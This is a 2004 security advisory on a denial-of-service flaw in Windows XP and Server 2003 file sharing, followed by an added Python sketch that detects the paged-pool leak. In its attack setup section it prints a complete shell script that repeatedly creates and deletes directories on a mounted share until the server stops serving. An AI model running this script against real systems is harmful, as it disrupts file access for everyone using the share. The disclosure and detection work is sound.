smbmountDoS.txt

03 Feb 2004 00:00:00 | Reported by Steve Ladjabi | Type: packetstorm | Source: packetstormsecurity.com

Denial of service vulnerability allows Unix users to disrupt file sharing on Windows systems.

`Announced: 2004-02-02  
Type: Denial of Service Attack on Windows  
Impact: smbmount can stop Windows from sharing files  
Writer: Daniel Kabs, Germany ([email protected])  
Credits: Thanks to Steve Ladjabi ([email protected])  
  
Contents:  
1. Abstract  
2. Affected Systems  
3. Attack Setup  
4. Symptoms   
5. Workaround  
  
  
1. Abstract  
  
A security vulnerability of "Windows XP" and "Windows 2003  
Server" has been found. These systems are open to a denial  
of service attack. If they share folders to a Unix client  
that is using smbmount (part of the Samba suite), any user  
on the client who has permissions to create directories on  
the mounted share can stop the Windows system from serving  
files. The attack induces a memory shortage on the Windows  
system by creating directories in a special way.  
  
2. Affected Systems  
  
This denial of service attack has been carried out  
successfully against  
- Microsoft Windows XP Professional, Service Pack 1  
- Microsoft Windows Server 2003  
  
Microsoft Windows 2000 Prof. and earlier versions of  
Windows are not affected by this attack.  
  
3. Attack Setup  
  
The attack was carried out successfully using  
- "Debian Linux", smbmount 3.0.0beta2  
- "Suse Linux 8.2", smbmount version 2.2.2  
as Unix clients  
  
The Windows system shares a folder. The Unix client mounts  
the share using smbmount. A user on the Unix client has  
write/create permissions to the shared folder.  
  
The user on the client creates and deletes a lot of  
directories on the mounted share using the following  
script:  
  
#!/bin/sh  
# winblast v3 - DoS on WinXP, Win2003Srv  
# 2003-12-04 Steve Ladjabi  
  
count=0  
  
# using 'pathcount' directories  
pathcount=1000  
  
echo running \'winblast v3\' with $pathcount files in loop ...  
  
while [ 1 ]; do  
p=$((pathcount*2-1))  
stop=$((pathcount-1))  
while [ "$p" != "$stop" ]; do  
dirname=wbst$p  
# delete old directory if it exists, exit on any error  
if [ -d $dirname ]; then  
rmdir $dirname || exit 3  
fi;  
  
# generating directory and exit on any error  
mkdir $dirname || exit 1  
p=$((p-1))  
count=$((count+1))  
done;  
echo $count directories generated ...  
done;  
#-- end --  
  
The script will create 1000 directories and then take  
turns deleting and re-creating them. There will be no  
more than those 1000 directories at any time!  
  
Every time a directory is created, the Windows system  
allocates paged pool memory. This memory is not freed  
although the directory gets deleted.  
  
After having created and deleted 3.5 million directories,  
the Windows system's paged pool memory has been depleted  
and it denies access to the share. One tested Windows XP  
system managed to take 5.8 million directories until it  
stopped serving. This happens about 4 hours after the  
attack was started.  
  
4. Symptoms   
  
When the Windows system suddenly fails, it ceases serving,  
i.e. users can not access files nor list directory contents  
any more from the client. Any client will have lost its  
access to the share.  
  
On the Windows system the event log shows an error with  
event id 2020.  
  
Additionally, the Administrator of the Windows system can  
neither unshare the folder nor kill the session due to the  
lack of memory resources. Trying to open the management  
console will result in error messages to this effect.  
Executing the command "net share /delete" fails due to  
the memory shortage.  
  
The only way to get the Windows system working again is  
to reboot it.  
  
Putting more RAM in the machine running Windows will not  
help as the paged pool memory is limited to 343MB. (See  
MS KB article Q312362).  
  
5. Workaround  
  
Administrators should schedule a daily reboot of the  
Windows system.  
`
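
The advisory describes paged pool memory that grows with every directory created and is never freed, up to a 343MB ceiling. The sketch below is an added example, not part of the original advisory: it watches for that signature in a window of paged-pool readings and projects when the ceiling would be reached. It assumes the readings were collected from the Windows `\Memory\Pool Paged Bytes` performance counter; the sample values, function names and thresholds are constructed for illustration.

```python
# Added example (not from the advisory); all sample readings are constructed.
from datetime import datetime, timedelta

PAGED_POOL_LIMIT = 343 * 1024 * 1024  # ceiling quoted in the advisory (343MB)


def fit_slope(samples):
    """Least-squares growth rate in bytes/second for (datetime, bytes) samples."""
    t0 = samples[0][0]
    xs = [(t - t0).total_seconds() for t, _ in samples]
    ys = [b for _, b in samples]
    mx, my = sum(xs) / len(xs), sum(ys) / len(ys)
    var = sum((x - mx) ** 2 for x in xs)
    if var == 0:
        return 0.0
    return sum((x - mx) * (y - my) for x, y in zip(xs, ys)) / var


def assess(samples, min_samples=6, warn_within=timedelta(hours=2)):
    """Classify a window of paged-pool readings.

    Returns (status, eta): status is 'ok', 'leak-suspected' or 'critical';
    eta is the projected time until the ceiling is reached, or None.
    """
    if len(samples) < min_samples:
        return "ok", None
    values = [b for _, b in samples]
    # Leak signature from the advisory: memory is allocated but never freed,
    # so the pool does not shrink anywhere in the window.
    never_released = all(b >= a for a, b in zip(values, values[1:]))
    slope = fit_slope(samples)
    if not never_released or slope <= 0:
        return "ok", None
    eta = timedelta(seconds=max(0.0, PAGED_POOL_LIMIT - values[-1]) / slope)
    return ("critical" if eta <= warn_within else "leak-suspected"), eta


def readings(mb_values, interval=timedelta(minutes=10)):
    """Turn constructed MB values into (datetime, bytes) samples."""
    base = datetime(2004, 2, 2, 8, 0)
    return [(base + i * interval, mb * 1024 * 1024) for i, mb in enumerate(mb_values)]


if __name__ == "__main__":
    windows = {"leaking": range(200, 312, 14), "slow": range(100, 140, 5),
               "normal": [90, 93, 88, 91, 89, 92, 90, 87]}
    for name, mbs in windows.items():
        print(name, assess(readings(mbs)))
```

A "critical" result gives the administrator time to end the offending session or unshare the folder before the pool is exhausted, after which the advisory notes that neither is possible without a reboot.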
